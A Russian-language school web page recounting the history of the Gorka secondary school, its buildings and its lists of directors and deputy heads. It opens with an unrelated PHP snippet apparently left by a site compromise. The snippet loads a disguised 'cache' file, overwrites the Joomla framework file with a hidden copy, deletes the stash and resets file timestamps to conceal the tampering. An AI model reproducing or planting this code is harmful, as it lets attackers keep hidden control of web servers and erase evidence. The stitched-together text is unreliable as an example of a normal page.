$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } История образовательного учреждения
Версия для слабовидящих

Как и когда образовалась

ГОРКОВСКАЯ СРЕДНЯЯ ШКОЛА.

Школа в Горке открылась в 1876 году, причем, именно, в Горке, а не в Согре.

Некоторые считают, что школа была основана в 1871 году. Этот вопрос и по сегодняшний день остается спорным, но все-таки большинство склоняется к 1876 году. В этой школе обучалось 39 мальчиков и 2 девочки. Были открыты начальные классы на Вадюге, в Великой, на Сарчеме, на Горке, в Согре, на Бору, в Керге, но эти школы открыли в более позднее время.

Наша Горковская средняя школа называлась Согринская начальная школа. В те времена на 4 класс были введены экзамены. Ученики сдавали русский язык, математику, географию, историю. Это были обязательные экзамены. По окончании начальной школы выдавалось свидетельство.

В период с 1934 по 1935 год на базе Горковской начальной школы (в д.Горка) начали открывать семилетку. Сначала был открыт 5-й класс. В 1935 – 1936 учебном году – 6-й класс, а в 1936-1937 учебном году – 7-й класс. И в июне 1937 года был первый выпуск школьников из семилетки. В то время школа называлась ГОРКОВСКАЯ НЕПОЛНАЯ СРЕДНЯЯ ШКОЛА, сокращенно ГНСШ.

Местные девчата говорили:

ГНСШ – большая школа, четырехугольная.

Когда кончу эту школу, буду птичка вольная.

Первым директором ГНСШ была РОМАНОВА ЕЛЕНА АЛЕКСЕЕВНА. Она была учителем химии.

В д.Горка семилетка просуществовала до 1 октября 1941 года.

В период с 1939 по 1940 годы в Согре, по настоянию директора Романовой Е.А., под школу начали перестраивать здание церкви, в которой в то время располагался клуб. Здание было перестроено в двухэтажное. В сентябре 1941 года здание довели до готовности: сложили печи. Все учащиеся были отправлены на работу в колхоз до 1 октября.

1 октября 1941 года в новой школе, теперь уже в д.Согре, начались занятия. Название так и осталось ГОРКОВСКАЯ НЕПОЛНАЯ СРЕДНЯЯ ШКОЛА (СЕМИЛЕТКА).

В среднюю школу семилетка стала преобразовываться в 1953-1954 уч.году. Был открыт 8-1 класс, а в последующие учебные годы – 9-й и 10-й классы.

Первый выпуск десятиклассников состоялся в июне 1956 года.

Директорами семилетней школы были:

РОМАНОВА ЕЛЕНА АЛЕКСЕЕВНА

МОСЕЕВА ЗИНАИДА АНДРЕЕВНА

ПЕРВЫШИН АРСЕНИЙ ФЕДОРОВИЧ

ВАСИЛЕВСКАЯ ВАЛЕНТИНА АЛЕКСЕЕВНА.

Первым директором уже теперешней Горковской средней школы - Мосеева Нина Ивановна. После нее были:

ТЮПИНА ЛИДИЯ СТЕПАНОВНА

БЫЗОВ ИВАН СТЕПАНОВИЧ

ДУНАЕВ АРКАДИЙ ИВАНОВИЧ

ЛЫЧЕВ НИКОЛАЙ АЛЕКСАНДРОВИЧ.

Было построено еще одно здание, оно стояло на месте теперешнего спортзала. Но так как не хватало классных комнат, то начали строить здание, в котором теперь находится школа. Это здание приплавлено из Охтомы. В Охтоме оно было больницей. В этом здании занятия начались в 1959 – 1960 уч.году.

С 1950 года в ГСШ работало 140 учителей. А если считать семилетнюю школу в Горке, то будет свыше 150 преподавателей.

Начиная с 1950 уч.года, в школе завучами были:

ПЕРВЫШИНА ЛИДИЯ СТЕПАНОВНА

ВАСИЛЕВСКАЯ ВАЛЕНТИНА АЛЕКСЕЕВНА

МОСЕЕВ ГЕННАДИЙ АЛЕКСЕЕВИЧ

ТОРОПОВА ЛЮБОВЬ МАТВЕЕВНА

ДУНАЕВА ФАИНА ЕФИМОВНА

ЗАМЯТИНА ТАМАР МИХАЙЛОВНА

БЕЧИНА ВАЛЕНТИНА ИВАНОВНА

ДУМИНА ВАЛЕНТИНА ИВАНОВНА

БЕЧИНА ЛЮДМИЛА ЛЕОНИДОВНА

РУСАНОВ АЛЕКСАНДР ВАЛЕНТИНОВИЧ

СОЛДАТОВА ВАЛЕНТИНА ЮРЬЕВНА.

Из директоров нашей школы в дальнейшем стали заведующими роно:

МОСЕЕВА ЗИНАИДА АНДРЕЕВНА

ТЮПИНА ЛИДИЯ СТЕПАНОВНА

БЫЗОВ ИВАН СТЕПАНОВИЧ.

В период с 1965 по 1968 уч.года к основному зданию школы добавили еще несколько классов ( пристройка).

(Записано со слов учителя русского языка и литературы МЫСОВОЙ ЛИДИИ МИХАЙЛОВНЫ.)